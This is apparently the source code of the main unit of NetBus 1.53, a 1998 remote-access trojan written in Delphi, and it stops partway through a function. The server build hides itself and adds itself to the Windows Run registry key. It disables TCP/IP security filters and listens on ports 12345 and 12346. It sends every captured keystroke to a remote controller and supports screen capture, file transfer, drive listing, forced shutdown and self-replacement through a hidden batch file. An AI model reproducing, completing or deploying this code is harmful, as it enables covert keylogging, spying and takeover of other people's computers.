// NetBus (c) 1998 by cf
unit Main;

interface

uses
  SysUtils, Windows, Messages, Classes, Graphics, Controls,
  Forms, Dialogs, StdCtrls, MPlayer, ExtCtrls, ComCtrls, ScktComp,
  DriveList, FileIterator, Volume;

const
  WM_MSGREADY = WM_USER + 1;
  WM_NEXTTEST = WM_USER + 2;
  WM_HANDLEUPLOAD = WM_USER + 3;
  WM_NEXTSCAN = WM_USER + 4;
//  WM_TESTTEST = WM_USER + 10;

type
  TTransferMode = (tmScreen, tmWave, tmDiskList, tmUpload, tmDownload);

  TMainForm = class(TForm)
    MediaPlayer1: TMediaPlayer;
    EjectButton: TButton;
    IntervalEdit: TEdit;
    WaitTimer: TTimer;
    EjectButton2: TButton;
    SwapButton: TButton;
    StartAppButton: TButton;
    ApplicationEdit: TEdit;
    HostLabel: TLabel;
    Label2: TLabel;
    Label3: TLabel;
    DownloadButton: TButton;
    PlayButton: TButton;
    MessageButton: TButton;
    MessageEdit: TEdit;
    MessageLabel: TLabel;
    ExitButton: TButton;
    MouseButton: TButton;
    MouseXEdit: TEdit;
    MouseYEdit: TEdit;
    ControlButton: TButton;
    StatusBar1: TStatusBar;
    ConnectButton: TButton;
    ListenButton : TButton;
    ScreenButton: TButton;
    URLButton : TButton;
    ImageButton : TButton;
    UserButton: TButton;
    DelayLabel: TLabel;
    DelayEdit: TEdit;
    DelayTimer: TTimer;
    ServerSock: TServerSocket;
    ClientSock: TClientSocket;
    ServerSock2: TServerSocket;
    ClientSock2: TClientSocket;
    ConnectTimer: TTimer;
    DomainButton: TButton;
    UploadButton: TButton;
    OpenDialog1: TOpenDialog;
    SoundButton: TButton;
    RecordTimer: TTimer;
    HostBox: TComboBox;
    ClickButton: TButton;
    FileIterator1: TFileIterator;
    DriveList1: TDriveList;
    procedure EjectButtonClick(Sender: TObject);
    procedure EjectButton2Click(Sender: TObject);
    procedure WaitTimerTimer(Sender: TObject);
    procedure SwapButtonClick(Sender: TObject);
    procedure StartAppButtonClick(Sender: TObject);
    procedure DownloadButtonClick(Sender: TObject);
    procedure HostEditExit(Sender: TObject);
    procedure HostEditChange(Sender: TObject);
    procedure PlayButtonClick(Sender: TObject);
    procedure MessageButtonClick(Sender: TObject);
    procedure ExitButtonClick(Sender: TObject);
    procedure MouseButtonClick(Sender: TObject);
    procedure ControlButtonClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure FormShow(Sender: TObject);
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
    procedure FormDestroy(Sender: TObject);
    procedure ConnectButtonClick(Sender: TObject);
    procedure URLButtonClick(Sender: TObject);
    procedure ListenButtonClick(Sender: TObject);
    procedure ImageButtonClick(Sender: TObject);
    procedure TextButtonClick(Sender: TObject);
    procedure UserButtonClick(Sender: TObject);
    procedure ScreenButtonClick(Sender: TObject);
    procedure DelayEditExit(Sender: TObject);
    procedure DelayTimerTimer(Sender: TObject);
    procedure ClientSockRead(Sender: TObject; Socket: TCustomWinSocket);
    procedure ClientSockConnect(Sender: TObject; Socket: TCustomWinSocket);
    procedure ClientSockDisconnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ServerSockClientRead(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ClientSock2Disconnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ServerSockClientError(Sender: TObject;
      Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
      var ErrorCode: Integer);
    procedure ServerSock2ClientError(Sender: TObject;
      Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
      var ErrorCode: Integer);
    procedure ClientSockError(Sender: TObject; Socket: TCustomWinSocket;
      ErrorEvent: TErrorEvent; var ErrorCode: Integer);
    procedure ClientSock2Error(Sender: TObject; Socket: TCustomWinSocket;
      ErrorEvent: TErrorEvent; var ErrorCode: Integer);
    procedure ServerSockClientConnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ServerSockClientDisconnect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ConnectTimerTimer(Sender: TObject);
    procedure ClientSock2Read(Sender: TObject; Socket: TCustomWinSocket);
    procedure ServerSock2GetThread(Sender: TObject;
      ClientSocket: TServerClientWinSocket;
      var SocketThread: TServerClientThread);
    procedure DomainButtonClick(Sender: TObject);
    procedure UploadButtonClick(Sender: TObject);
    procedure ClientSock2Write(Sender: TObject; Socket: TCustomWinSocket);
    procedure SoundButtonClick(Sender: TObject);
    procedure RecordTimerTimer(Sender: TObject);
    procedure ClientSock2Connect(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure IntervalEditExit(Sender: TObject);
    procedure ClickButtonClick(Sender: TObject);
    procedure FormActivate(Sender: TObject);
    procedure FileIterator1AddFile(Sender: TObject; const FileName: string;
      const FileInfo: TFileInfo);
    procedure FileIterator1NewDirectory(Sender: TObject;
      const DirName: string);
    procedure FileIterator1Terminate(Sender: TObject);
  private
    AccessList : TStringList;
    WaitConnect : Word;
    WaitConnect2 : Word;
    IPBase : string;
    LastIPPart : Byte;
    IPLeft : Integer;
    NextIP : string;
    ConnStep : Byte;
    ReceiveMem : TMemoryStream;
    SendFile : TFileStream;
    DirFile : TextFile;
    HostChanged : Boolean;
    MasterAccess : Boolean;
    ServerPwd : string;
    ClientPwd : string;
    WindowsDir : string;
    TempPath : string;
    MouseHook : HHook;
    Clients : Word;
    CmdDelay : Word;
    WMNewChar : Word;
    KeyWnd : HWnd;
    Listen : Boolean;
    CDOpen : Boolean;
    KeyClick : Boolean;
    ServerSt : string;
    ClientSt : string;
    ScreenCapture : TBitmap;
    CmdList : TStringList;
    SkipDirs : TStringList;
    CurrDrive : Word;
//    ScreenEvent : TEvent;
    ConnectReady : Boolean;
    TransfSize : LongInt;
    SavePics : Boolean;
    FirstWrite : Boolean;
    FormActivated : Boolean;
    ServClientSock1 : TCustomWinSocket; { Server "response on client command" socket }
    ServClientSock2 : TCustomWinSocket; { Server "response on key press" socket }
    procedure WMGetMinMaxInfo(var Msg : TWMGetMinMaxInfo); message WM_GETMINMAXINFO;
    procedure WMInitMenuPopup(var Msg: TWMInitMenuPopup); message WM_INITMENUPOPUP;
    procedure WMNCHitTest(var Msg: TWMNCHitTest); message WM_NCHITTEST;
    function GetServerText : string;
    function GetClientText : string;
    procedure SetServerText(Value : string);
    procedure SetClientText(Value : string);
    procedure AppException(Sender : TObject; E : Exception);
    procedure SetStatusBar(St : string; Pan : Byte);
    function AddReg(Root : HKEY; Key, Name, Value : string) : Boolean;
    function RemoveReg(Root : HKEY; Key, Name : string) : Boolean;
    function RegExists(Root : HKEY; Key, Name : string) : Boolean;
    procedure RemoveSecurity;
    procedure SetVolume(VolP : Word);
    procedure ShutdownWin(Flags : Word);
    procedure GetScreenCapture(ScreenCap : TBitmap);
    procedure SendMousePos(X, Y : Integer);
    function EncodeKeys(Keys : string) : string;
    function DecodeKeys(Keys : string) : string;
    function ConnectHost(Addr : string) : Boolean;
    procedure SetCDRomTray(Open : Boolean);
    procedure GetKeyProc(var Msg : TMessage);
    procedure WMMsgReady(var Msg : TMessage); message WM_MSGREADY;
    procedure WMNextTest(var Msg : TMessage); message WM_NEXTTEST;
    procedure WMHandleUpload(var Msg : TMessage); message WM_HANDLEUPLOAD;
    procedure WMNextScan(var Msg : TMessage); message WM_NEXTSCAN;
    procedure SetConnectButton(Enable : Boolean; Caption : string);
    procedure HandleServerData(Sender : TObject; Data : string);
    procedure HandleClientData(Data : string);
    function ScanNextDrive : Boolean;
    function FindAddr(Addr : string) : Integer;
    procedure AddAccessList(Addr : string; Acc : Boolean);
    function HasAccess(Addr : string) : Boolean;
    procedure DeleteAddr(Addr : string);
    procedure SetPriority(High : Boolean);
    procedure WaitResponse(Timeout : Word);
    procedure ReadSettings;
    procedure ReadSettingsSvr;
    procedure SaveSettings;
    procedure SaveSettingsSvr;
    procedure AddToLog(Addr, St : string);
    function LastPicNumber(Path, Pre : string) : Word;
    function SkipThisFile(FileName : string; IsFile : Boolean) : Boolean;
    procedure ScreenDisconnect(Sender: TObject; Socket: TCustomWinSocket);
    procedure WaveDisconnect(Sender : TObject; Socket : TCustomWinSocket);
    procedure DiskListDisconnect(Sender : TObject; Socket : TCustomWinSocket);
    procedure DownloadDisconnect(Sender : TObject; Socket : TCustomWinSocket);
    procedure ScreenRead(Sender : TObject; Socket : TCustomWinSocket);
    procedure UploadWrite(Sender : TObject; Socket : TCustomWinSocket);
    procedure UploadWrite2(Sender : TObject; Socket : TCustomWinSocket);
  public
    RemoteVer : string;
    AppPath : string;
    AppName : string;
    KeyHookVer : string;
    CurrAddr : string;
    GetDisks : Boolean;
    TransfFile : string;
    TransfMode : TTransferMode;
    property ServerText : string read GetServerText write SetServerText;
    property ClientText : string read GetClientText write SetClientText;
    function SetMediaPlayer(const Name : string) : Boolean;
    procedure SetAddress(Sock : TClientSocket; Addr : string);
  end;

  TScreenServerThread = class(TServerClientThread)
  public
    procedure ClientExecute; override;
  end;

  TUploadServerThread = class(TServerClientThread)
  public
    ReceiveMem : TMemoryStream;
    constructor Create(CreateSuspended: Boolean; ASocket: TServerClientWinSocket);
    destructor Destroy; override;
    procedure ClientExecute; override;
  end;

var
  MainForm: TMainForm;

const
  Version = '1.53';
  BusPort = 12345; // 12345
  DataPort = 12346; // 12346

implementation

uses MMSystem, Registry, Msg, Listen, Img, SendKey2, ShellAPI,
     Jpeg, Memo, KeyDll, Wave, Sound, Shut, {$IFNDEF SERVER} Choose, {$ENDIF}
     WinSock, FileCtrl;

{ function LastChar : Char; stdcall; external 'KEYHOOK.DLL';
procedure SetKeyHook(Wnd : HWnd); stdcall; external 'KEYHOOK.DLL';
procedure ClearKeyHook; stdcall; external 'KEYHOOK.DLL'; }

{$R *.DFM}

function MouseProc(Code : Integer; wParam : WPARAM; lParam : LPARAM) : LongInt; stdcall;
var
  Point : TPoint;
begin
  try
    Result := 0;
    if Code < 0 then
      CallNextHookEx(MainForm.MouseHook, Code, WParam, LParam);
  except
    Application.HandleException(nil);
  end;
  if Code <> HC_NOREMOVE then begin
    Point := TMouseHookStruct(Pointer(lParam)^).pt;
    MainForm.SendMousePos(Point.x, Point.y);
  end;
end;

function GetParam(Text : string; Sep : Char; P : Byte) : string;
var
  I : Integer;
begin
  I := 1;
  while (I < P) and (Pos(Sep, Text) > 0) do begin
    Delete(Text, 1, Pos(Sep, Text));
    Inc(I);
  end;
  if P > I then Result := ''
  else if Pos(Sep, Text) = 0 then Result := Text
  else Result := Copy(Text, 1, Pos(Sep, Text) - 1);
end;

procedure ExecuteFileOptions(App : string; Priority : Word; ShowWnd : Word);
var
  Process : TProcessInformation;
  Startup : TStartupInfo;
  hProcess : THandle;
  ReturnCode : Integer;
begin
 {The handles for both the process and the main thread
  must be closed through calls to CloseHandle. If these
  handles are not needed, it is best to close them
  immediately after the process is created.}
  FillChar(Startup, SizeOf(Startup), 0);
  Startup.cb := SizeOf(Startup);
  if ShowWnd <> 0 then begin
    Startup.dwFlags := Startup.dwFlags + STARTF_USESHOWWINDOW;
    Startup.wShowWindow := ShowWnd;
  end;
  if CreateProcess(nil, PChar(App), nil, nil, False,
   CREATE_DEFAULT_ERROR_MODE + Priority,
   nil, nil, Startup, Process) then begin
    CloseHandle(Process.hThread);
    CloseHandle(Process.hProcess);
  end;
end;

procedure ExecuteFile(App : string);
begin
  ExecuteFileOptions(App, NORMAL_PRIORITY_CLASS, 0);
end;

procedure DelayMS(MS : Word);
var
  Start : LongInt;
begin
  Start := GetTickCount;
  while (Start + MS >= GetTickCount) and not Application.Terminated do
    Application.ProcessMessages;
end;

function NumChars(Ch : Char; Num : Word) : string;
var
  I : Integer;
begin
  SetLength(Result, Num);
  for I := 1 to Num do
    Result[I] := Ch;
end;

function GetFileSize(Name : string) : LongInt;
var
  F : hFile;
begin
  F := CreateFile(PChar(Name), 0, FILE_SHARE_READ, nil, OPEN_ALWAYS, 0, 0);
  Result := Windows.GetFileSize(F, nil);
  CloseHandle(F);
end;

procedure TMainForm.WMGetMinMaxInfo(var Msg : TWMGetMinMaxInfo);
begin
  inherited;
  if FormActivated then begin
    Msg.MinMaxInfo^.ptMinTrackSize := Point(Width, Height);
    Msg.MinMaxInfo^.ptMaxTrackSize := Point(Width, Height);
  end;
end;

procedure TMainForm.WMInitMenuPopup(var Msg: TWMInitMenuPopup);
begin
  inherited;
  if Msg.SystemMenu then
    EnableMenuItem(Msg.MenuPopup, SC_SIZE, MF_BYCOMMAND or MF_GRAYED);
end;

procedure TMainForm.WMNCHitTest(var Msg: TWMNCHitTest);
begin
  inherited;
  if Msg.Result in [HTLEFT, HTRIGHT, HTBOTTOM, HTBOTTOMRIGHT,
   HTBOTTOMLEFT, HTTOP, HTTOPRIGHT, HTTOPLEFT] then
    Msg.Result := Integer(HTNOWHERE);
end;

function TMainForm.GetServerText : string;
begin
  if ServClientSock1 <> nil then
    Result := ServClientSock1.ReceiveText;
end;

function TMainForm.GetClientText : string;
begin
  Result := ClientSock.Socket.ReceiveText;
end;

procedure TMainForm.SetServerText(Value : string);
begin
  if ServClientSock1 <> nil then
    ServClientSock1.SendText(Value);
end;

procedure TMainForm.SetClientText(Value : string);
begin
  ClientSock.Socket.SendText(Value);
end;

procedure TMainForm.GetKeyProc(var Msg : TMessage);
var
  Ch : Char;
  T : TextFile;
begin
  with Msg do
  if Msg = WMNewChar then begin
    if ServClientSock2 = nil then
      Exit;
    if KeyHookVer <= '1.10' then begin
      Ch := Char(wParam);
      if Ch <> #0 then
        ServClientSock2.SendText('Key;0;' + EncodeKeys(Ch) + #13)
      else ServClientSock2.SendText('Key;1;' + IntToStr(lParam) + #13);
    end else // Make it work in the future. 
      ServClientSock2.SendText('Key;100;' + IntToStr(wParam) + ';' + IntToStr(lParam) + #13);
  end else
    Result := DefWindowProc(KeyWnd, Msg, wParam, lParam);
end;

procedure TMainForm.WMMsgReady(var Msg : TMessage);
var
  Temp : PChar;
begin
  if Msg.Msg = WM_MSGREADY then begin // This is really not needed.
    Temp := MsgForm.Memo1.Lines.GetText;
    ServerText := 'Msg;' + EncodeKeys(string(Temp)) + #13;
    StrDispose(Temp);
  end else
    inherited;
end;

procedure TMainForm.WMNextTest(var Msg : TMessage);
begin
  if Msg.Msg = WM_NEXTTEST then
    ConnectHost(NextIP)
  else inherited;
end;

procedure TMainForm.WMHandleUpload(var Msg : TMessage);
var
  T : TextFile;
  Error : Boolean;
begin
  if Msg.Msg = WM_HANDLEUPLOAD then begin
    if LowerCase(TransfFile) = 'sysedit.exe' then begin
      AssignFile(T, string(TempPath) + 'temp.bat');
      Error := False;
      try
        Rewrite(T);
        Writeln(T, ':Repeat');
        Writeln(T, 'del ' + ParamStr(0));
        Writeln(T, 'if exist ' + ParamStr(0) + ' goto Repeat');
        Writeln(T, 'if not exist ' + AppPath + 'KeyHook.new goto Start');
        Writeln(T, 'copy ' + AppPath + 'KeyHook.new ' + AppPath + 'KeyHook.dll');
        Writeln(T, 'del ' + AppPath + 'KeyHook.new');
        Writeln(T, ':Start');
        Writeln(T, 'copy ' + AppPath + 'SysEdit.new ' + ParamStr(0));
        Writeln(T, 'del ' + AppPath + 'SysEdit.new');
        Writeln(T, 'start ' + ParamStr(0));
//        Write(T, 'del ' + string(TempPath) + 'temp.bat');
        CloseFile(T);
      except
        Error := True;
      end;
      if not Error then begin
        ServerText := 'PatchDone'#13;
        DelayMS(200);
        ExecuteFileOptions(string(TempPath) + 'temp.bat',
          { CREATE_SUSPENDED + } IDLE_PRIORITY_CLASS, SW_HIDE);
        SetPriority(True);
        Application.Terminate;
      end;
    end;
  end else
    inherited;
end;

procedure TMainForm.WMNextScan(var Msg : TMessage);
begin
  if not ScanNextDrive then begin
    CloseFile(DirFile);
    TransfFile := '';
    TransfMode := tmDiskList;
    ServerText := 'DisksDone;' + IntToStr(GetFileSize(TempPath + 'temp.dsk')) + #13;
  end;
end;

procedure TMainForm.AppException(Sender : TObject; E : Exception);
begin
  // Do nothing, just trap the exception!
end;

procedure TMainForm.SetStatusBar(St : string; Pan : Byte);
begin
  StatusBar1.Panels.Items[Pan].Text := St;
  StatusBar1.Update;
end;

function TMainForm.AddReg(Root : HKEY; Key, Name, Value : string) : Boolean;
begin
  with TRegistry.Create do
  try
    Result := False;
    RootKey := Root;
    if OpenKey(Key, True) then begin
      Result := True;
      WriteString(Name, Value);
      CloseKey;
    end;
  finally
    Free;
  end;
end;

function TMainForm.RemoveReg(Root : HKEY; Key, Name : string) : Boolean;
begin
  with TRegistry.Create do
  try
    Result := False;
    RootKey := Root;
    if OpenKey(Key, False) then begin
      Result := DeleteValue(Name);
      CloseKey;
    end;
  finally
    Free;
  end;
end;

function TMainForm.RegExists(Root : HKEY; Key, Name : string) : Boolean;
begin
  with TRegistry.Create do begin
    Result := False;
    RootKey := Root;
    if OpenKey(Key, False) then begin
      Result := ValueExists(Name);
      CloseKey;
    end;
    Free;
  end;
end;

procedure TMainForm.RemoveSecurity;
begin
  with TRegistry.Create do
  try
    RootKey := HKEY_LOCAL_MACHINE;
    if OpenKey('\SYSTEM\ControlSet001\Services\Tcpip\Parameters', True) then begin
      WriteInteger('EnableSecurityFilters', 0);
//      WriteInteger('IPEnableRouter', 0);
//      WriteInteger('ForwardBroadcasts', 0);
      CloseKey;
    end;
  finally
    Free;
  end;
end;

function TMainForm.EncodeKeys(Keys : string) : string;
var
  I : Word;
  Ch : Char;
begin
  I := 1;
  Result := '';
  while I <= Length(Keys) do begin
    case Keys[I] of
      #13 : begin
        Ch := '|';
        if (I < Length(Keys)) and (Keys[I + 1] = #10) then
          Inc(I);
      end;
      #10 : Ch := '|';
      else
        Ch := Keys[I];
    end;
    Result := Result + Ch;
    Inc(I);
  end;
end;

function TMainForm.DecodeKeys(Keys : string) : string;
var
  I : Word;
  Ch : Char;
begin
  I := 1;
  Result := '';
  while I <= Length(Keys) do begin
    case Keys[I] of
      '|' : Ch := #13;
      else
        Ch := Keys[I];
    end;
    Result := Result + Ch;
    Inc(I);
  end;
end;

procedure TMainForm.SetAddress(Sock : TClientSocket; Addr : string);
begin
  Sock.Host := '';
  Sock.Address := '';
  if Addr[1] in ['0'..'9'] then
    Sock.Address := Addr
  else Sock.Host := Addr;
end;

function TMainForm.ConnectHost(Addr : string) : Boolean;
var
  Tick : LongInt;
begin
  SetStatusBar('Connecting to ' + Addr + '...', 0);
  ConnStep := 1;
  try
    ClientSock.Port := BusPort;
    CurrAddr := Addr;
    SetAddress(ClientSock, Addr);
    ClientSock.Open;
    ConnectTimer.Interval := WaitConnect * 1000;
    ConnectTimer.Enabled := True;
  except
    on ESocketError do begin
      ConnectTimer.Enabled := False;
      SetStatusBar('Couldn''t connect to ' + Addr, 0);
    end;
  end;
end;

procedure TMainForm.SetCDRomTray(Open : Boolean);
begin
  if Open then
    mciSendString('Set cdaudio door open wait', nil, 0, handle)
  else mciSendString('Set cdaudio door closed wait', nil, 0, handle);
end;

function TMainForm.SetMediaPlayer(const Name : string) : Boolean;
begin
  Result := True;
  MediaPlayer1.DeviceType := dtAutoSelect;
  MediaPlayer1.FileName := Name;
  if Name = 'D:' then MediaPlayer1.DeviceType := dtCDAudio;
  try
    MediaPlayer1.Open;
  except
    on EMCIDeviceError do Result := False;
  end;
end;

procedure TMainForm.SetVolume(VolP : Word);
var
  Volume : LongInt;
  VolL, VolR : Word;
begin
  if waveOutGetNumDevs = 0 then
   Exit;
  VolL := ($FFFF div 100) * VolP;
  VolR := ($FFFF div 100) * VolP;
  Volume := (VolL * 65536) + VolR;
  waveOutSetVolume(0, Volume);
end;

procedure TMainForm.ShutdownWin(Flags : Word);
var
  hToken : THandle;
  tkp, ptkp : TTokenPrivileges;
  i : DWORD;
begin
  OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES + TOKEN_QUERY, hToken);
  LookupPrivilegeValue(nil, PChar('SeShutdownPrivilege'), tkp.Privileges[0].Luid);
  tkp.PrivilegeCount := 1;
  tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
  AdjustTokenPrivileges(hToken, False, tkp, SizeOf(tkp), ptkp, i);
  GetLastError;
  ExitWindowsEx(EWX_FORCE or Flags, 0);
end;

procedure TMainForm.GetScreenCapture(ScreenCap : TBitmap);
var
  DeskDC : HDC;
  DeskCanvas : TCanvas;
  DeskRect : TRect;
begin
  DeskDC := GetWindowDC(GetDeskTopWindow);
  DeskCanvas := TCanvas.Create;
  DeskCanvas.Handle := DeskDC;
  DeskRect := Rect(0, 0, Screen.Width, Screen.Height);
  with ScreenCap do begin
    Width := Screen.Width;
    Height:= Screen.Height;
//  PixelFormat := pfDevice;
  end;
  ScreenCap.Canvas.CopyRect(DeskRect, DeskCanvas, DeskRect);
  DeskCanvas.Free;
  ReleaseDC(GetDesktopWindow, DeskDC);
end;

procedure TMainForm.EjectButtonClick(Sender: TObject);
begin
  if EjectButton.Caption = 'Open CD-ROM' then begin
    ClientText := 'Eject;1'#13;
    EjectButton.Caption := 'Close CD-ROM';
  end else begin
    ClientText := 'Eject;0'#13;
    EjectButton.Caption := 'Open CD-ROM';
  end;
end;

procedure TMainForm.EjectButton2Click(Sender: TObject);
begin
  if EjectButton2.Caption = 'Start CD timer' then begin
    WaitTimer.Tag := 1;
    WaitTimer.Enabled := True;
    EjectButton2.Caption := 'Stop CD timer';
  end else begin
    WaitTimer.Enabled := False;
    EjectButton2.Caption := 'Start CD timer';
  end;
end;

procedure TMainForm.WaitTimerTimer(Sender: TObject);
begin
  case WaitTimer.Tag of
    1: ClientText := 'Eject;?'#13;
    2: begin
         WaitTimer.Enabled := False;
         ScreenButtonClick(Sender);
       end;
  end;
end;

procedure TMainForm.SwapButtonClick(Sender: TObject);
begin
  if SwapButton.Caption = 'Swap mouse' then begin
    ClientText := 'SwapButton;1'#13;
    SwapButton.Caption := 'Restore mouse';
  end else begin
    ClientText := 'SwapButton;0'#13;
    SwapButton.Caption := 'Swap mouse';
  end;
end;

procedure TMainForm.StartAppButtonClick(Sender: TObject);
begin
  if ApplicationEdit.Text <> '' then begin
    ClientText := 'StartApp;' + ApplicationEdit.Text + #13;
    Exit;
  end;
  {$IFNDEF SERVER}
  with ChooseForm do
  if (ShowModal <> mrOk) or (TreeView1.Selected = nil) then
    Exit;
  ClientText := 'StartApp;' + ChooseForm.FileName + #13;
  {$ENDIF}
end;

procedure TMainForm.DownloadButtonClick(Sender: TObject);
begin
  if RemoteVer <= '1.46' then begin
    Application.MessageBox('Uppgradera till en nyare version hos vrden.',
      'Info', MB_ICONEXCLAMATION or MB_OK);
    Exit;
  end;
  {$IFNDEF SERVER}
  with ChooseForm do
  if (ShowModal <> mrOk) or (TreeView1.Selected = nil) then
    Exit;
  DownloadButton.Enabled := False;
  SetStatusBar('', 1);
  TransfFile := ExtractFileName(ChooseForm.FileName);
  ClientText := 'DownloadFile;' + ChooseForm.FileName + #13;
  {$ENDIF}
end;

procedure TMainForm.HostEditExit(Sender: TObject);
begin
  HostChanged := False;
end;

procedure TMainForm.HostEditChange(Sender: TObject);
begin
  HostChanged := True;
end;

procedure TMainForm.PlayButtonClick(Sender: TObject);
var
  SoundFile : string;
begin
  SoundFile := '';
  if not InputQuery('Sound', 'Which WAV-file: ', SoundFile) then
    Exit;
  if Pos('.wav', LowerCase(SoundFile)) = 0 then
    SoundFile := SoundFile + '.wav';
  ClientText := 'PlaySound;' + SoundFile + #13;
end;

procedure TMainForm.MessageButtonClick(Sender: TObject);
begin
  ClientText := 'Message;' + MessageEdit.Text + #13;
end;

procedure TMainForm.ExitButtonClick(Sender: TObject);
begin
  ShutForm.Show;
end;

procedure TMainForm.MouseButtonClick(Sender: TObject);
var
  Temp : string;
begin
  Temp := 'SetMousePos';
  if MouseXEdit.Text = '' then
    Temp := Temp + ';' + '0'
  else Temp := Temp + ';' + MouseXEdit.Text;
  if MouseYEdit.Text = '' then
    Temp := Temp + ';' + '0'
  else Temp := Temp + ';' + MouseYEdit.Text;
  ClientText := Temp + #13;
end;

procedure TMainForm.ControlButtonClick(Sender: TObject);
var
  Temp : DWORD;
begin
  if ControlButton.Caption = 'Control mouse' then begin
    MouseHook := SetWindowsHookEx(WH_MOUSE, @MouseProc, 0, GetCurrentThreadID);
    ControlButton.Caption := 'Stop control';
  end else begin
    UnhookWindowsHookEx(MouseHook);
    MouseHook := 0;
    ControlButton.Caption := 'Control mouse';
  end;
end;

procedure TMainForm.SendMousePos(X, Y : Integer);
const
  NumEvents : Word = 0;
begin
  MouseXEdit.Text := IntToStr(X);
  MouseYEdit.Text := IntToStr(Y);
  Inc(NumEvents);
  if NumEvents = 2 then begin
    MouseButtonClick(Self);
    NumEvents := 0;
  end;
end;

procedure TMainForm.FormCreate(Sender: TObject);
var
  Temp : array[0..144] of Char;
  I : Integer;
begin
  AppPath := ExtractFilePath(ParamStr(0));
  AppName := Copy(ExtractFileName(ParamStr(0)), 1, Length(
    ExtractFileName(ParamStr(0))) - 4);
  ChDir(AppPath);
  {$IFDEF SERVER}
  ShowWindow(Application.Handle, SW_HIDE);
  Application.ShowMainForm := False;
  Application.OnException := AppException;
  KeyWnd := AllocateHWnd(GetKeyProc);
  // We want to create new threads every time depening on
  // what transfer mode we are in!!
  ServerSock2.ThreadCacheSize := 0;
  AccessList := TStringList.Create;
  SkipDirs := TStringList.Create;
  ReadSettingsSvr;
  {$ELSE}
  ReadSettings;
  {$ENDIF}
  GetDisks := True;
  CDOpen := False;
  Clients := 0;
  CmdDelay := 0;
  CmdList := TStringList.Create;
  GetWindowsDirectory(Temp, 144);
  WindowsDir := StrPas(Temp);
  GetTempPath(144, Temp);
  TempPath := StrPas(Temp);
  if not DirectoryExists(TempPath) then
    TempPath := AppPath;
  HostChanged := False;
  WMNewChar := RegisterWindowMessage('NetBus Char');
  ServerSt := '';
  ClientSt := '';
  ReceiveMem := TMemoryStream.Create;
//  ScreenEvent := TEvent.Create(nil, True, False, 'NetBus Screen');
  {$IFDEF SERVER}
  for I := 1 to ParamCount do begin
    if LowerCase(ParamStr(I)) = '/add' then begin
      AddReg(HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', AppName, ParamStr(0));
      RemoveSecurity;
    end;
    if LowerCase(ParamStr(I)) = '/remove' then begin
      RemoveReg(HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', AppName);
      Application.Terminate;
    end;
    if Pos('/pass:', LowerCase(ParamStr(I))) = 1 then begin
      ServerPwd := Copy(ParamStr(I), 7, 20);
      SaveSettingsSvr;
    end;
  end;
  LoadKeyDll;
  KeyHookVer := '1.00';
  if @GetKeyVer <> nil then begin
    GetKeyVer(Temp);
    KeyHookVer := string(Temp);
  end;
  ServerSock.Port := BusPort;
  ServerSock.Open; // Start listen
  ServerSock2.Port := DataPort;
  ServerSock2.Open; // Start listen
  {$ELSE}
  Application.ShowMainForm := True;
  ClientSock.Address := '';
  {$ENDIF}
end;

procedure TMainForm.ReadSettings;
begin
  with TRegIniFile.Create(AppName) do begin
    WaitConnect := ReadInteger('Settings', 'WaitConnect', 4);
    WaitConnect2 := ReadInteger('Settings', 'WaitConnect2', 6);
    HostBox.Text := ReadString('Settings', 'Host', 'localhost');
    IntervalEdit.Text := ReadString('Settings', 'WaitInt', '0');
    DelayEdit.Text := ReadString('Settings', 'Delay', '0');
    ApplicationEdit.Text := ReadString('Settings', 'Application', 'http://www.casino.com');
    MessageEdit.Text := ReadString('Settings', 'Message', 'Error');
    SavePics := ReadBool('Settings', 'SavePics', False);
    ClientPwd := ReadString('Settings', 'ClientPwd', '');
    MasterAccess := ReadBool('Settings', 'MasterAccess', False);
    Free;
  end;
end;

procedure TMainForm.ReadSettingsSvr;
begin
  with TRegIniFile.Create(AppName) do begin
    ServerPwd := ReadString('Settings', 'ServerPwd', '');
    Free;
  end;
end;

procedure TMainForm.SaveSettings;
begin
  with TRegIniFile.Create(AppName) do begin
    WriteInteger('Settings', 'WaitConnect', WaitConnect);
    WriteInteger('Settings', 'WaitConnect2', WaitConnect2);
    WriteString('Settings', 'Host', HostBox.Text);
    WriteString('Settings', 'WaitInt', IntervalEdit.Text);
    WriteString('Settings', 'Delay', DelayEdit.Text);
    WriteString('Settings', 'Application', ApplicationEdit.Text);
    WriteString('Settings', 'Message', MessageEdit.Text);
    WriteBool('Settings', 'SavePics', SavePics);
    Free;
  end;
end;

procedure TMainForm.SaveSettingsSvr;
begin
  with TRegIniFile.Create(AppName) do begin
    WriteString('Settings', 'ServerPwd', ServerPwd);
    Free;
  end;
end;

procedure TMainForm.FormShow(Sender: TObject);
begin
  {$IFNDEF SERVER}
  IntervalEditExit(Sender);
  ClientSockDisconnect(nil, nil);
  if FileExists(AppPath + 'Hosts.txt') then
    HostBox.Items.LoadFromFile(AppPath + 'Hosts.txt');
  {$ENDIF}
end;

procedure TMainForm.FormClose(Sender: TObject; var Action: TCloseAction);
begin
  {$IFDEF SERVER}
  ServerSock.Close; // Stop listen
  ServerSock2.Close;
  FreeKeyDll;
  {$ELSE}
  if MouseHook <> 0 then
    UnhookWindowsHookEx(MouseHook);
  HostBox.Items.SaveToFile('Hosts.txt');
  {$ENDIF}
end;

procedure TMainForm.SetPriority(High : Boolean);
var
  tPri, pPri : DWORD;
begin
  tPri := THREAD_PRIORITY_NORMAL;
  pPri := NORMAL_PRIORITY_CLASS;
  if High then begin
    tPri := THREAD_PRIORITY_HIGHEST;
    pPri := HIGH_PRIORITY_CLASS;
  end;
  SetThreadPriority(GetCurrentThread, tPri);
  SetPriorityClass(GetCurrentProcess, pPri);
end;

function TMainForm.ScanNextDrive : Boolean;
begin
  Result := False;
  while (CurrDrive < DriveList1.DriveCount) and not Result do begin
